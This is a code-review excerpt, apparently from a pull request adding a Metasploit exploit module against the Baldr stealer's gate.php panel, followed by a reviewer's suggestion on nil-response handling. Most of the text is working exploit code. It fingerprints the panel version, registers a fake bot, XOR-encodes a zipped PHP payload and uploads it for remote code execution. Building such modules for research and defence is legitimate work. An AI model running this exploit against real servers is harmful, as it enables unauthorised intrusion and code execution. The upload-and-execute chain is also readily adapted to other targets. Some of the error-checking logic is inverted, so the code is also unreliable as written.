modules/exploits/multi/http/baldr_upload_exec.rb

```diff
@@ -0,0 +1,242 @@
+      ]
+    )
+  end
+
+  def check
+    if select_target
+      Exploit::CheckCode::Appears("Baldr Verison: #{select_target.name}")
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def select_target
+    res = send_request_cgi(
+        'method'    => 'GET',
+        'uri'       => normalize_uri(target_uri.path,"/gate.php")
+    )
+    if res && res.code == 200
+      if res.body.include?('~;~')
+        targets[3]
+      elsif res.body.include?(';')
+        targets[2]
+      elsif res.body.size < 4
+        targets[1]
+      else
+        nil
+      end
+    end
+  end
+
+  def exploit
+    # Start by checking the gate version
+    check
+    # Forge the payload
+    name = '.'+Rex::Text.rand_text_alpha(4)
+    files =
+    [
+      {data: payload.encoded, fname: "#{name}.php"}
+    ]
+    zip = Msf::Util::EXE.to_zip(files)
+    hwid = Rex::Text.rand_text_alpha(8).upcase
+
+
+    version = select_target
+    # If not 'Auto' then use the selected version
+    if target != targets[0]
+      version = target
+    end
+
+    case version
+    when targets[3]
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"gate.php")
+      })
+      unless res || res.code != 200 || res.body.to_s.include?('~;~')
+          fail_with(Failure::UnexpectedReply, "Could not obtain gate key")
+      end
+      key = res.body.to_s.split('~;~')[0]
+      print_good("Key: #{key}")
+
+      data = "hwid=#{hwid}&os=Windows 10 x64&cookie=0&paswd=0&credit=0&wallet=0&file=1&autofill=0&version=v3.0"
+      data = xor(data,key)
+
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"gate.php"),
+        'data'  => data.to_s
+      })
+
+      if res && res.code == 200
+        print_good("Bot successfully registered.")
+      else
+        fail_with(Failure::UnexpectedReply, "Could not obtain gate key")
+      end
+
+      data = xor(zip.to_s,key)
+      form = Rex::MIME::Message.new
+      form.add_part(data.to_s, 'application/octet-stream', 'binary', "form-data; name=\"file\"; filename=\"#{hwid}.zip\"")
+
+      res = send_request_cgi({
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path,"gate.php"),
+        'ctype'     => "multipart/form-data; boundary=#{form.bound}",
+        'data'      => form.to_s
+      })
+
+      if res && res.code == 200
+        print_good("Payload uploaded to /logs/#{hwid}/#{name}.php")
+      else
+        print_error("Server responded with code #{res.code}")
+        fail_with(Failure::UnexpectedReply, "Failed to upload payload")
+      end
+
+    when targets[2]
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => normalize_uri(target_uri.path,"gate.php")
+      })
+
+      unless res || res.code != 200 || res.body.to_s.include?('~;~')
+        fail_with(Failure::UnexpectedReply, "Could not obtain gate key")
+      end
```

Comment:
This should first check for a valid response before checking the code / response body since it could result in a `nil` error.

```suggestion
      fail_with(Failure::NotFound, "Failed to obtain response") unless res
      unless res.code != 200 || res.body.to_s.include?('~;~')
        fail_with(Failure::UnexpectedReply, "Could not obtain gate key")
      end
```